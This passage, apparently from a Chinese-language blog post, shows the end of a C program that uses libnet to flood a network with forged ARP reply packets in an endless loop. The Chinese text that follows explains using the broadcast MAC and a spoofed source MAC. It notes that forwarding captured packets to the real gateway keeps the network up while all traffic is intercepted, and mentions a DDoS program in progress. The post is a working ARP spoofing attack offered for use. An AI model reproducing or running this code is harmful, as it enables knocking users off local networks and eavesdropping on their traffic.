(u_int8_t *)&source_hardware,
ETHERTYPE_ARP,
NULL,
0,
l,
0
);
i = 0;
while(1){
packet_size = libnet_write(l); //发送构造的ARP数据包
usleep(10);
i++;
}
printf("数据包长度为:%dn",packet_size);
libnet_destroy(l);
return 0;
}
目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。
如果不想弄断网,只进行欺骗的话,数据发送过来之后,要进行转发到正确的网关,这样就保证内网网络正常,而且所有数据都被监听了
